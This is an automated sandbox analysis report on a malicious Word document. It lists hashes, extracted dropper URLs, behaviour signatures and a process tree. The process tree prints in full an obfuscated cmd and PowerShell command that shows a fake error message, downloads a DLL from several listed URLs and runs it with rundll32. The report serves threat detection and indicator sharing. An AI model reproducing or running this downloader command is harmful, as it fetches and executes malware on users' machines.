Analysis

  • max time kernel
    145s
  • max time network
    147s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    14-01-2021 14:59

General

  • Target

    besked_2821599 364436.doc

  • Size

    158KB

  • MD5

    d5000b230a8233a3a2accf351349dc61

  • SHA1

    ab2281d43fd61122ef577b24f33b3376823f76f2

  • SHA256

    1be61e9a502a880e31d7732ee6c82c0aaf3bd5ae7e30654f42755e51bda9d2ba

  • SHA512

    f7d76f41a0c2f224e24841f2145e1542846b9d709d4bdc3ed1dfeeded9f734c116d55f2d09665ecb8c12d96dfedf77f8e44a849e4768e1b1b53ae41e68517371

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://fynart.com/wp-admin/aNuMy/

exe.dropper

http://dermedicoclinic.com/js/NElI8ZC/

exe.dropper

http://geolifesciences.com/font/r/

exe.dropper

http://rollinghood.com/how-to-ifwed/buj6VQx/

exe.dropper

http://jardindhelena.com/wp-content/u20/

exe.dropper

http://kingshowworldshoppingmall.com/cgi-bin/Ga/

exe.dropper

http://davinciworldshoppingmall.com/cgi-bin/Eh/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\besked_2821599 364436.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:640
  • C:\Windows\system32\cmd.exe
    cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IAAkAEYATQBYACAAIAA9ACAAIABbAHQAeQBQAEUAXQAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AewA0AH0AIgAtAEYAIAAnAE8ALgAnACwAJwBTAFkAcwB0ACcALAAnAC4AaQAnACwAJwBFAG0AJwAsACcAZABJAHIAZQBjAFQATwByAHkAJwApACAAOwAgACQAaQBzAG8AZgBlAFcAPQAgACAAWwBUAFkAcABlAF0AKAAiAHsANAB9AHsAMQB9AHsAMAB9AHsAMwB9AHsANQB9AHsANgB9AHsAOAB9AHsAMgB9AHsANwB9ACIAIAAtAEYAJwBlAE0ALgAnACwAJwBTAFQAJwAsACcASQBuAFQATQBBACcALAAnAE4ARQB0AC4AJwAsACcAUwB5ACcALAAnAFMARQAnACwAJwBSAFYASQAnACwAJwBuAGEAZwBlAHIAJwAsACcAQwBlAHAATwAnACkAIAA7ACAAIAAkAEUANgBjAGIAMgA2AGUAPQAkAFAANQA4AEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFIAMgA1AE0AOwAkAEcAMQAxAFUAPQAoACcARwA3ACcAKwAnADEAVAAnACkAOwAgACgAIABnAGUAVAAtAHYAQQByAGkAQQBiAGwAZQAgAGYAbQBYACAAIAAtAFYAYQBsAHUAZQBvACAAIAApADoAOgAiAGMAUgBgAEUAQQBUAEUAZABJAGAAUgBFAGAAYwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAHkAVQAnACsAJwBYAEUANgBuAHgAMwAnACsAJwA4ADUAJwApACsAKAAnAHkAJwArACcAVQBYACcAKQArACgAJwBBAGgAagAnACsAJwAyAHYAJwApACsAJwB4ACcAKwAnAG4AeQAnACsAJwBVACcAKwAnAFgAJwApAC4AIgByAEUAYABQAGwAYQBjAGUAIgAoACgAWwBjAGgAQQBSAF0AMQAyADEAKwBbAGMAaABBAFIAXQA4ADUAKwBbAGMAaABBAFIAXQA4ADgAKQAsACcAXAAnACkAKQApADsAJABEAF8AMwBNAD0AKAAoACcAQwAnACsAJwBfADcAJwApACsAJwBHACcAKQA7ACAAIAAoACAAIABWAGEAcgBJAGEAQgBsAGUAIAAoACcASQBTAG8AZgAnACsAJwBFAHcAJwApACkALgBWAGEAbABVAEUAOgA6ACIAUwBgAGUAYwB1AFIASQBUAFkAUABSAG8AdABgAE8AQwBgAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzACcAKQArACcAMQAyACcAKQA7ACQAVQA2ADYASwA9ACgAKAAnAEgAJwArACcAMwAxACcAKQArACcAVgAnACkAOwAkAEsAMwAyADAAMgBzAF8AIAA9ACAAKAAoACcAVAAnACsAJwBfADIAJwApACsAJwBTACcAKQA7ACQAVAA3ADMARQA9ACgAKAAnAEQANwAnACsAJwAwACcAKQArACcARwAnACkAOwAkAEMAMQBlADgAXwByAHYAPQAkAEgATwBNAEUAKwAoACgAKAAnAEcAJwArACcAagBIACcAKQArACcARQAnACsAKAAnADYAbgB4ADMAOAA1ACcAKwAnAEcAagBIAEEAaABqACcAKwAnADIAdgAnACkAKwAnAHgAJwArACgAJwBuACcAKwAnAEcAagAnACkAKwAnAEgAJwApAC4AIgBSAEUAcABsAGAAQQBgAEMAZQAiACgAKABbAGMAaABhAHIAXQA3ADEAKwBbAGMAaABhAHIAXQAxADAANgArAFsAYwBoAGEAcgBdADcAMgApACwAJwBcACcAKQApACsAJABLADMAMgAwADIAcwBfACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQAUQAzADIAQwA9ACgAJwBUADcAJwArACcAMgBGACcAKQA7ACQARABoAHEAYgA1AGIAeAA9ACgAJwBBACcAKwAoACcAXQBbAHEAWwAnACsAJwBEACcAKwAnADoAJwArACcALwAvAGYAeQBuAGEAJwApACsAKAAnAHIAJwArACcAdAAuAGMAbwAnACsAJwBtAC8AJwApACsAKAAnAHcAcAAnACsAJwAtACcAKQArACgAJwBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AYQAnACkAKwAoACcATgAnACsAJwB1ACcAKwAnAE0AeQAvAEAAJwArACcAQQBdAFsAcQBbACcAKwAnAEQAOgAnACkAKwAoACcALwAnACsAJwAvAGQAZQAnACkAKwAoACcAcgAnACsAJwBtAGUAZABpAGMAbwBjAGwAaQAnACsAJwBuAGkAJwArACcAYwAuAGMAJwApACsAKAAnAG8AbQAvACcAKwAnAGoAcwAvAE4ARQBsACcAKQArACgAJwBJADgAWgAnACsAJwBDAC8AQABBACcAKQArACgAJwBdAFsAJwArACcAcQAnACkAKwAoACcAWwBEACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBnAGUAbwBsAGkAJwApACsAJwBmAGUAJwArACgAJwBzAGMAaQAnACsAJwBlAG4AYwBlAHMALgAnACsAJwBjAG8AJwArACcAbQAnACkAKwAnAC8AJwArACcAZgBvACcAKwAnAG4AJwArACgAJwB0AC8AcgAvAEAAQQAnACsAJwBdAFsAJwArACcAcQAnACkAKwAoACcAWwBEADoALwAvACcAKwAnAHIAbwAnACkAKwAnAGwAbAAnACsAKAAnAGkAJwArACcAbgBnAGgAJwArACcAbwAnACsAJwBvAGQALgBjAG8AbQAvACcAKwAnAGgAbwB3ACcAKQArACgAJwAtACcAKwAnAHQAbwAtAGkAZgB3ACcAKQArACcAZQBkACcAKwAoACcALwBiAHUAagA2ACcAKwAnAFYAJwApACsAKAAnAFEAeAAvAEAAJwArACcAQQBdAFsAcQAnACsAJwBbAEQAOgAvACcAKwAnAC8AJwArACcAagBhACcAKQArACcAcgBkACcAKwAoACcAaQBuAGQAaAAnACsAJwBlAGwAJwArACcAZQAnACkAKwAoACcAbgBhAC4AYwAnACsAJwBvAG0ALwAnACsAJwB3AHAALQAnACkAKwAoACcAYwBvACcAKwAnAG4AJwApACsAJwB0ACcAKwAnAGUAbgAnACsAJwB0ACcAKwAoACcALwB1ACcAKwAnADIAMAAvACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAoACcARAA6AC8AJwArACcALwAnACkAKwAoACcAawBpACcAKwAnAG4AJwApACsAJwBnACcAKwAnAHMAJwArACgAJwBoAG8AJwArACcAdwB3AG8AJwApACsAJwByAGwAJwArACgAJwBkACcAKwAnAHMAJwArACcAaABvAHAAcABpAG4AZwAnACkAKwAoACcAbQBhAGwAbAAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACcALwBjACcAKwAnAGcAJwArACgAJwBpAC0AYgAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcARwBhAC8AQABBACcAKwAnAF0AWwBxACcAKwAnAFsARAA6ACcAKwAnAC8ALwBkAGEAJwArACcAdgBpAG4AJwApACsAKAAnAGMAaQB3ACcAKwAnAG8AJwArACcAcgBsAGQAcwAnACkAKwAnAGgAbwAnACsAKAAnAHAAcAAnACsAJwBpAG4AJwApACsAKAAnAGcAbQBhAGwAbAAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvACcAKwAnAGMAJwApACsAKAAnAGcAaQAnACsAJwAtAGIAJwApACsAJwBpAG4AJwArACgAJwAvAEUAaAAnACsAJwAvACcAKQApAC4AIgBSAEUAUABMAGAAQQBgAGMARQAiACgAKAAnAEEAXQAnACsAKAAnAFsAcQBbACcAKwAnAEQAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACgAJwBkACcAKwAnAHMAZQAnACkAKwAnAHcAZgAnACkALAAoACgAJwB3ACcAKwAnAGUAdgB3ACcAKQArACcAZQAnACkAKQAsACgAJwBhAGUAJwArACcAZgBmACcAKQAsACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAJwApACkAKQBbADIAXQApAC4AIgBzAFAAYABMAGkAVAAiACgAJABSADcAOABKACAAKwAgACQARQA2AGMAYgAyADYAZQAgACsAIAAkAEEANgAzAEcAKQA7ACQARQA5ADYAVgA9ACgAJwBPADkAJwArACcANQBHACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWAByAHEAcAA5AGUANQAgAGkAbgAgACQARABoAHEAYgA1AGIAeAApAHsAdAByAHkAewAoACYAKAAnAE4AZQAnACsAJwB3AC0AJwArACcATwBiAGoAZQBjAHQAJwApACAAcwB5AHMAVABFAE0ALgBuAEUAdAAuAFcARQBCAEMATABJAGUAbgBUACkALgAiAEQATwB3AGAATgBsAG8AYABBAGQAZgBpAGAAbABFACIAKAAkAFgAcgBxAHAAOQBlADUALAAgACQAQwAxAGUAOABfAHIAdgApADsAJABHADgAMwBYAD0AKAAoACcAQwAnACsAJwAxAF8AJwApACsAJwBRACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAdAAnACsAJwBlAG0AJwApACAAJABDADEAZQA4AF8AcgB2ACkALgAiAGwAYABlAG4AZwB0AEgAIgAgAC0AZwBlACAANAA0ADkANwAzACkAIAB7AC4AKAAnAHIAdQBuACcAKwAnAGQAJwArACcAbABsADMAMgAnACkAIAAkAEMAMQBlADgAXwByAHYALAAoACgAJwBTAGgAbwAnACsAJwB3ACcAKQArACgAJwBEACcAKwAnAGkAYQAnACkAKwAoACcAbAAnACsAJwBvAGcAJwApACsAJwBBACcAKQAuACIAdABgAG8AcwBUAGAAUgBpAG4AZwAiACgAKQA7ACQAVQBfADYAWgA9ACgAJwBYACcAKwAoACcAMAAnACsAJwA1AFoAJwApACkAOwBiAHIAZQBhAGsAOwAkAEoAOAAwAEkAPQAoACgAJwBSADQAJwArACcAXwAnACkAKwAnAFEAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABFADAAMgBBAD0AKAAnAEoAJwArACgAJwA5ACcAKwAnADcAUQAnACkAKQA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:196
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:2328
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -w hidden -enc IAAkAEYATQBYACAAIAA9ACAAIABbAHQAeQBQAEUAXQAoACIAewAxAH0AewAzAH0AewAyAH0AewAwAH0AewA0AH0AIgAtAEYAIAAnAE8ALgAnACwAJwBTAFkAcwB0ACcALAAnAC4AaQAnACwAJwBFAG0AJwAsACcAZABJAHIAZQBjAFQATwByAHkAJwApACAAOwAgACQAaQBzAG8AZgBlAFcAPQAgACAAWwBUAFkAcABlAF0AKAAiAHsANAB9AHsAMQB9AHsAMAB9AHsAMwB9AHsANQB9AHsANgB9AHsAOAB9AHsAMgB9AHsANwB9ACIAIAAtAEYAJwBlAE0ALgAnACwAJwBTAFQAJwAsACcASQBuAFQATQBBACcALAAnAE4ARQB0AC4AJwAsACcAUwB5ACcALAAnAFMARQAnACwAJwBSAFYASQAnACwAJwBuAGEAZwBlAHIAJwAsACcAQwBlAHAATwAnACkAIAA7ACAAIAAkAEUANgBjAGIAMgA2AGUAPQAkAFAANQA4AEEAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFIAMgA1AE0AOwAkAEcAMQAxAFUAPQAoACcARwA3ACcAKwAnADEAVAAnACkAOwAgACgAIABnAGUAVAAtAHYAQQByAGkAQQBiAGwAZQAgAGYAbQBYACAAIAAtAFYAYQBsAHUAZQBvACAAIAApADoAOgAiAGMAUgBgAEUAQQBUAEUAZABJAGAAUgBFAGAAYwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAHkAVQAnACsAJwBYAEUANgBuAHgAMwAnACsAJwA4ADUAJwApACsAKAAnAHkAJwArACcAVQBYACcAKQArACgAJwBBAGgAagAnACsAJwAyAHYAJwApACsAJwB4ACcAKwAnAG4AeQAnACsAJwBVACcAKwAnAFgAJwApAC4AIgByAEUAYABQAGwAYQBjAGUAIgAoACgAWwBjAGgAQQBSAF0AMQAyADEAKwBbAGMAaABBAFIAXQA4ADUAKwBbAGMAaABBAFIAXQA4ADgAKQAsACcAXAAnACkAKQApADsAJABEAF8AMwBNAD0AKAAoACcAQwAnACsAJwBfADcAJwApACsAJwBHACcAKQA7ACAAIAAoACAAIABWAGEAcgBJAGEAQgBsAGUAIAAoACcASQBTAG8AZgAnACsAJwBFAHcAJwApACkALgBWAGEAbABVAEUAOgA6ACIAUwBgAGUAYwB1AFIASQBUAFkAUABSAG8AdABgAE8AQwBgAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzACcAKQArACcAMQAyACcAKQA7ACQAVQA2ADYASwA9ACgAKAAnAEgAJwArACcAMwAxACcAKQArACcAVgAnACkAOwAkAEsAMwAyADAAMgBzAF8AIAA9ACAAKAAoACcAVAAnACsAJwBfADIAJwApACsAJwBTACcAKQA7ACQAVAA3ADMARQA9ACgAKAAnAEQANwAnACsAJwAwACcAKQArACcARwAnACkAOwAkAEMAMQBlADgAXwByAHYAPQAkAEgATwBNAEUAKwAoACgAKAAnAEcAJwArACcAagBIACcAKQArACcARQAnACsAKAAnADYAbgB4ADMAOAA1ACcAKwAnAEcAagBIAEEAaABqACcAKwAnADIAdgAnACkAKwAnAHgAJwArACgAJwBuACcAKwAnAEcAagAnACkAKwAnAEgAJwApAC4AIgBSAEUAcABsAGAAQQBgAEMAZQAiACgAKABbAGMAaABhAHIAXQA3ADEAKwBbAGMAaABhAHIAXQAxADAANgArAFsAYwBoAGEAcgBdADcAMgApACwAJwBcACcAKQApACsAJABLADMAMgAwADIAcwBfACsAKAAoACcALgAnACsAJwBkAGwAJwApACsAJwBsACcAKQA7ACQAUQAzADIAQwA9ACgAJwBUADcAJwArACcAMgBGACcAKQA7ACQARABoAHEAYgA1AGIAeAA9ACgAJwBBACcAKwAoACcAXQBbAHEAWwAnACsAJwBEACcAKwAnADoAJwArACcALwAvAGYAeQBuAGEAJwApACsAKAAnAHIAJwArACcAdAAuAGMAbwAnACsAJwBtAC8AJwApACsAKAAnAHcAcAAnACsAJwAtACcAKQArACgAJwBhAGQAJwArACcAbQAnACkAKwAoACcAaQBuACcAKwAnAC8AYQAnACkAKwAoACcATgAnACsAJwB1ACcAKwAnAE0AeQAvAEAAJwArACcAQQBdAFsAcQBbACcAKwAnAEQAOgAnACkAKwAoACcALwAnACsAJwAvAGQAZQAnACkAKwAoACcAcgAnACsAJwBtAGUAZABpAGMAbwBjAGwAaQAnACsAJwBuAGkAJwArACcAYwAuAGMAJwApACsAKAAnAG8AbQAvACcAKwAnAGoAcwAvAE4ARQBsACcAKQArACgAJwBJADgAWgAnACsAJwBDAC8AQABBACcAKQArACgAJwBdAFsAJwArACcAcQAnACkAKwAoACcAWwBEACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBnAGUAbwBsAGkAJwApACsAJwBmAGUAJwArACgAJwBzAGMAaQAnACsAJwBlAG4AYwBlAHMALgAnACsAJwBjAG8AJwArACcAbQAnACkAKwAnAC8AJwArACcAZgBvACcAKwAnAG4AJwArACgAJwB0AC8AcgAvAEAAQQAnACsAJwBdAFsAJwArACcAcQAnACkAKwAoACcAWwBEADoALwAvACcAKwAnAHIAbwAnACkAKwAnAGwAbAAnACsAKAAnAGkAJwArACcAbgBnAGgAJwArACcAbwAnACsAJwBvAGQALgBjAG8AbQAvACcAKwAnAGgAbwB3ACcAKQArACgAJwAtACcAKwAnAHQAbwAtAGkAZgB3ACcAKQArACcAZQBkACcAKwAoACcALwBiAHUAagA2ACcAKwAnAFYAJwApACsAKAAnAFEAeAAvAEAAJwArACcAQQBdAFsAcQAnACsAJwBbAEQAOgAvACcAKwAnAC8AJwArACcAagBhACcAKQArACcAcgBkACcAKwAoACcAaQBuAGQAaAAnACsAJwBlAGwAJwArACcAZQAnACkAKwAoACcAbgBhAC4AYwAnACsAJwBvAG0ALwAnACsAJwB3AHAALQAnACkAKwAoACcAYwBvACcAKwAnAG4AJwApACsAJwB0ACcAKwAnAGUAbgAnACsAJwB0ACcAKwAoACcALwB1ACcAKwAnADIAMAAvACcAKQArACcAQAAnACsAKAAnAEEAJwArACcAXQBbACcAKQArACcAcQBbACcAKwAoACcARAA6AC8AJwArACcALwAnACkAKwAoACcAawBpACcAKwAnAG4AJwApACsAJwBnACcAKwAnAHMAJwArACgAJwBoAG8AJwArACcAdwB3AG8AJwApACsAJwByAGwAJwArACgAJwBkACcAKwAnAHMAJwArACcAaABvAHAAcABpAG4AZwAnACkAKwAoACcAbQBhAGwAbAAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACcALwBjACcAKwAnAGcAJwArACgAJwBpAC0AYgAnACsAJwBpACcAKQArACgAJwBuAC8AJwArACcARwBhAC8AQABBACcAKwAnAF0AWwBxACcAKwAnAFsARAA6ACcAKwAnAC8ALwBkAGEAJwArACcAdgBpAG4AJwApACsAKAAnAGMAaQB3ACcAKwAnAG8AJwArACcAcgBsAGQAcwAnACkAKwAnAGgAbwAnACsAKAAnAHAAcAAnACsAJwBpAG4AJwApACsAKAAnAGcAbQBhAGwAbAAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvACcAKwAnAGMAJwApACsAKAAnAGcAaQAnACsAJwAtAGIAJwApACsAJwBpAG4AJwArACgAJwAvAEUAaAAnACsAJwAvACcAKQApAC4AIgBSAEUAUABMAGAAQQBgAGMARQAiACgAKAAnAEEAXQAnACsAKAAnAFsAcQBbACcAKwAnAEQAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAoACgAJwBkACcAKwAnAHMAZQAnACkAKwAnAHcAZgAnACkALAAoACgAJwB3ACcAKwAnAGUAdgB3ACcAKQArACcAZQAnACkAKQAsACgAJwBhAGUAJwArACcAZgBmACcAKQAsACgAJwBoACcAKwAoACcAdAAnACsAJwB0AHAAJwApACkAKQBbADIAXQApAC4AIgBzAFAAYABMAGkAVAAiACgAJABSADcAOABKACAAKwAgACQARQA2AGMAYgAyADYAZQAgACsAIAAkAEEANgAzAEcAKQA7ACQARQA5ADYAVgA9ACgAJwBPADkAJwArACcANQBHACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQAWAByAHEAcAA5AGUANQAgAGkAbgAgACQARABoAHEAYgA1AGIAeAApAHsAdAByAHkAewAoACYAKAAnAE4AZQAnACsAJwB3AC0AJwArACcATwBiAGoAZQBjAHQAJwApACAAcwB5AHMAVABFAE0ALgBuAEUAdAAuAFcARQBCAEMATABJAGUAbgBUACkALgAiAEQATwB3AGAATgBsAG8AYABBAGQAZgBpAGAAbABFACIAKAAkAFgAcgBxAHAAOQBlADUALAAgACQAQwAxAGUAOABfAHIAdgApADsAJABHADgAMwBYAD0AKAAoACcAQwAnACsAJwAxAF8AJwApACsAJwBRACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAdAAnACsAJwBlAG0AJwApACAAJABDADEAZQA4AF8AcgB2ACkALgAiAGwAYABlAG4AZwB0AEgAIgAgAC0AZwBlACAANAA0ADkANwAzACkAIAB7AC4AKAAnAHIAdQBuACcAKwAnAGQAJwArACcAbABsADMAMgAnACkAIAAkAEMAMQBlADgAXwByAHYALAAoACgAJwBTAGgAbwAnACsAJwB3ACcAKQArACgAJwBEACcAKwAnAGkAYQAnACkAKwAoACcAbAAnACsAJwBvAGcAJwApACsAJwBBACcAKQAuACIAdABgAG8AcwBUAGAAUgBpAG4AZwAiACgAKQA7ACQAVQBfADYAWgA9ACgAJwBYACcAKwAoACcAMAAnACsAJwA1AFoAJwApACkAOwBiAHIAZQBhAGsAOwAkAEoAOAAwAEkAPQAoACgAJwBSADQAJwArACcAXwAnACkAKwAnAFEAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABFADAAMgBBAD0AKAAnAEoAJwArACgAJwA5ACcAKwAnADcAUQAnACkAKQA=
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4088
        • C:\Windows\system32\rundll32.exe
          "C:\Windows\system32\rundll32.exe" C:\Users\Admin\E6nx385\Ahj2vxn\T_2S.dll,ShowDialogA
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2612
          • C:\Windows\SysWOW64\rundll32.exe
            "C:\Windows\system32\rundll32.exe" C:\Users\Admin\E6nx385\Ahj2vxn\T_2S.dll,ShowDialogA
            4⤵
            • Loads dropped DLL
            • Drops file in System32 directory
            • Suspicious use of WriteProcessMemory
            PID:3528
            • C:\Windows\SysWOW64\rundll32.exe
              C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Rlpwsjniqphmvdh\rdpegojkwozyws.rfg",ShowDialogA
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:2836

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\E6nx385\Ahj2vxn\T_2S.dll
      MD5

      2b26b868102f32d8726a3df440fa91d1

      SHA1

      f86316e3c6358f21dc092a61165d5fe3a7370f1b

      SHA256

      bd80c6b05957aefc390bb2e8fd2ce13042e4bd8d8a8f622c523e48d111c5dd49

      SHA512

      f61c0507b88b497099ee1636087494ac617d74573ad2fe12b1da154c6cc8c1315144e9810ddd2389f5f7ece708dbc6feb3045e31d6a427d011af43bde613dcf9

    • \Users\Admin\E6nx385\Ahj2vxn\T_2S.dll
      MD5

      2b26b868102f32d8726a3df440fa91d1

      SHA1

      f86316e3c6358f21dc092a61165d5fe3a7370f1b

      SHA256

      bd80c6b05957aefc390bb2e8fd2ce13042e4bd8d8a8f622c523e48d111c5dd49

      SHA512

      f61c0507b88b497099ee1636087494ac617d74573ad2fe12b1da154c6cc8c1315144e9810ddd2389f5f7ece708dbc6feb3045e31d6a427d011af43bde613dcf9

    • memory/640-2-0x00007FF9FCB10000-0x00007FF9FD147000-memory.dmp
      Filesize

      6.2MB

    • memory/2328-3-0x0000000000000000-mapping.dmp
    • memory/2612-8-0x0000000000000000-mapping.dmp
    • memory/2836-12-0x0000000000000000-mapping.dmp
    • memory/3528-10-0x0000000000000000-mapping.dmp
    • memory/4088-4-0x0000000000000000-mapping.dmp
    • memory/4088-5-0x00007FF9F5B30000-0x00007FF9F651C000-memory.dmp
      Filesize

      9.9MB

    • memory/4088-6-0x00000268DD900000-0x00000268DD901000-memory.dmp
      Filesize

      4KB

    • memory/4088-7-0x00000268DDAB0000-0x00000268DDAB1000-memory.dmp
      Filesize

      4KB